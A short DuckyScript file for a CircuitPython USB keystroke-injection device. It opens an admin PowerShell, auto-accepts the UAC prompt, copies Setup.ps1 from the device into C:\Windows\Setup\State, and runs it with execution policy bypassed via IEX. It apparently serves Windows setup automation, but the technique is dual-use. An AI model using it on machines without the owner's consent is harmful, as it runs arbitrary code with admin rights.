REM wait for enumaration:
DELAY 2000

REM open powershell as Admin:
GUI r
DELAY 1000
STRING powershell
DELAY 1000
CTRL SHIFT ENTER
DELAY 1000
ALT y
DELAY 1000

REM copy Setup.ps1 to Windows:
REM get the drive letter for ducky:
STRING $p = (Get-Volume -FriendlyName circuitpy).DriveLetter + ":\Setup.ps1"
ENTER

DELAY 1000

STRING Copy-Item -Path $p -Destination C:\Windows\Setup\State\Setup.ps1
ENTER

DELAY 500

REM run Setup:
STRING Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; IEX(IWR C:\Windows\Setup\State\Setup.ps1 -UseBasicParsing)
ENTER

STRING exit
ENTER